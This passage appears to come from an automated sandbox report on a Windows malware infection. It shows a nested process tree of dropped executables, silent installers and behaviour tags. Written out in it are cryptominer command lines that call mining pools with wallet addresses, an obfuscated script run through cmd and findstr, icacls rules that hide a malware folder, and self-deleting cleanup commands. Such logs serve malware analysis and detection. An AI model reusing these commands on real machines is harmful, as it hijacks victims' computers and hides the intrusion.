                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:2408
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 1304
                                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:6524
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\K627DUIRFH\setups.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\K627DUIRFH\setups.exe" ll
                                                                                                                                                                                                                                                                                  18⤵
                                                                                                                                                                                                                                                                                    PID:4696
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-JDEJV.tmp\setups.tmp
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-JDEJV.tmp\setups.tmp" /SL5="$409FC,1873631,71168,C:\Users\Admin\AppData\Local\Temp\K627DUIRFH\setups.exe" ll
                                                                                                                                                                                                                                                                                      19⤵
                                                                                                                                                                                                                                                                                        PID:7660
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX4\Free.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Free.exe"
                                                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                                                      PID:5268
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                                                                                                                                        18⤵
                                                                                                                                                                                                                                                                                          PID:8356
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                          PID:5248
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\EAEA.tmp.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\EAEA.tmp.exe"
                                                                                                                                                                                                                                                                                            18⤵
                                                                                                                                                                                                                                                                                              PID:6296
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w8724 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                                                                                                                                19⤵
                                                                                                                                                                                                                                                                                                  PID:8388
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                  -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w25001@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                                                                                                                    PID:4336
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
                                                                                                                                                                                                                                                                                                  18⤵
                                                                                                                                                                                                                                                                                                    PID:5584
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                      ping 127.0.0.1
                                                                                                                                                                                                                                                                                                      19⤵
                                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                                      PID:3984
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"
                                                                                                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                                                                                                    PID:796
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\otvk0s51.sjk\6762a766.exe & exit
                                                                                                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                                                                                                  PID:8036
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\otvk0s51.sjk\6762a766.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\otvk0s51.sjk\6762a766.exe
                                                                                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                                                                                      PID:9124
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iqt4smxu.c42\app.exe /8-2222 & exit
                                                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                                                      PID:6384
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\iqt4smxu.c42\app.exe
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\iqt4smxu.c42\app.exe /8-2222
                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                          PID:5740
                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"
                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                PID:6048
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ESHWPX6F2Y\multitimer.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\ESHWPX6F2Y\multitimer.exe" 0 306065bb10421b26.04333812 0 103
                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                  PID:6364
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ESHWPX6F2Y\multitimer.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\ESHWPX6F2Y\multitimer.exe" 1 3.1618033214.60713a3ea211d 103
                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                                                    PID:2504
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ESHWPX6F2Y\multitimer.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\ESHWPX6F2Y\multitimer.exe" 2 3.1618033214.60713a3ea211d
                                                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                                                        PID:6476
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\te2pjgltuvo\Setup3310.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\te2pjgltuvo\Setup3310.exe" /Verysilent /subid=577
                                                                                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                                                                                            PID:7332
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-EQ83L.tmp\Setup3310.tmp
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-EQ83L.tmp\Setup3310.tmp" /SL5="$4033C,138429,56832,C:\Users\Admin\AppData\Local\Temp\te2pjgltuvo\Setup3310.exe" /Verysilent /subid=577
                                                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                                                PID:7656
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-QVMMP.tmp\Setup.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-QVMMP.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                                                                                                                    PID:7696
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\ee2ib325znx\app.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\ee2ib325znx\app.exe" /8-23
                                                                                                                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                                                                                                                  PID:7308
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ee2ib325znx\app.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\ee2ib325znx\app.exe" /8-23
                                                                                                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                                                                                                      PID:7588
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\vlksx45g0v4\ezslpkyawxi.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\vlksx45g0v4\ezslpkyawxi.exe" /ustwo INSTALL
                                                                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                                                                      PID:7280
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 648
                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                        PID:7592
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 660
                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                        PID:8604
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 776
                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                        PID:1232
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 808
                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                        PID:7876
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 888
                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                        PID:9024
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 856
                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                        PID:6064
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 1184
                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                        PID:6980
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 1196
                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                        PID:7636
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 1288
                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                        PID:7236
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 1280
                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                        PID:8196
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\fmklqp5womw\vpn.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\fmklqp5womw\vpn.exe" /silent /subid=482
                                                                                                                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                                                                                                                        PID:7948
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-VEKQ8.tmp\vpn.tmp
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-VEKQ8.tmp\vpn.tmp" /SL5="$F03E0,15170975,270336,C:\Users\Admin\AppData\Local\Temp\fmklqp5womw\vpn.exe" /silent /subid=482
                                                                                                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                                                                                                            PID:8088
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ce25zd1p1xz\setup_10.2_us3.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\ce25zd1p1xz\setup_10.2_us3.exe" /silent
                                                                                                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                                                                                                            PID:5824
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IWUT32AHGP\setups.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\IWUT32AHGP\setups.exe" ll
                                                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                      PID:6440
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-0U42O.tmp\setups.tmp
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-0U42O.tmp\setups.tmp" /SL5="$205F0,1873631,71168,C:\Users\Admin\AppData\Local\Temp\IWUT32AHGP\setups.exe" ll
                                                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                        PID:6604
                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe
                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe"
                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                    PID:5828
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                                                        PID:5396
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Congiunte.vstx
                                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                        PID:6044
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                                                                            PID:6188
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                              findstr /V /R "^vwjMyTzhxjHATonkmcjOlJMtCRUiLDSlcOLAlCdfhnxfouvyjMTUesyNfophYkCRzbtybXwXyWALgvWvcPVYKYirIYkwzrswWDWKw$" Tue.vstx
                                                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                                                                PID:8464
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com
                                                                                                                                                                                                                                                                                                                                Infinita.exe.com x
                                                                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                                                                  PID:8692
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com x
                                                                                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                                                                                      PID:6168
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe
                                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                                          PID:8128
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Videos\xmrmin.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Videos\xmrmin.exe"
                                                                                                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                                                                                                              PID:6540
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                                                                                                                                  PID:7268
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\PULServices.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\PULServices.exe"
                                                                                                                                                                                                                                                                                                                                                  18⤵
                                                                                                                                                                                                                                                                                                                                                    PID:7984
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                                                                      19⤵
                                                                                                                                                                                                                                                                                                                                                        PID:6976
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\PULServices.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\PULServices.exe"
                                                                                                                                                                                                                                                                                                                                                          20⤵
                                                                                                                                                                                                                                                                                                                                                            PID:9964
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                                                                              21⤵
                                                                                                                                                                                                                                                                                                                                                                PID:5188
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Videos\ethminer.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Videos\ethminer.exe"
                                                                                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                                                                                          PID:5532
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                                                                                                                                                                                            18⤵
                                                                                                                                                                                                                                                                                                                                                              PID:5744
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\WUFServices.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"
                                                                                                                                                                                                                                                                                                                                                              18⤵
                                                                                                                                                                                                                                                                                                                                                                PID:4576
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:8748
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Videos\111.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Videos\111.exe"
                                                                                                                                                                                                                                                                                                                                                                17⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:4336
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Videos\111.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Videos\111.exe"
                                                                                                                                                                                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:7056
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
                                                                                                                                                                                                                                                                                                                                                                        19⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:7336
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
                                                                                                                                                                                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                            PID:5660
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
                                                                                                                                                                                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                            PID:4088
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
                                                                                                                                                                                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                            PID:5408
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Videos\Vickybuild.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Videos\Vickybuild.exe"
                                                                                                                                                                                                                                                                                                                                                                      17⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:2192
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:7076
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                                                                                                                                                                                            18⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:5528
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                                                                                                                                                                                              18⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:6896
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:948
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                                                                                                                                                                                                  18⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:7752
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                      19⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                      PID:5180
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:7508
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\makecab.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\makecab.exe"
                                                                                                                                                                                                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:9632
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 8128 C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe"
                                                                                                                                                                                                                                                                                                                                                                                      17⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:8860
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                          taskkill /F /PID 8128
                                                                                                                                                                                                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                          PID:6280
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                                                                                                                          choice /C Y /N /D Y /T 3
                                                                                                                                                                                                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:6944
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 30
                                                                                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                    PID:8216
                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\EIWNPZWleLKv.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\EIWNPZWleLKv.exe"
                                                                                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                              PID:4180
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:7056
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:7072
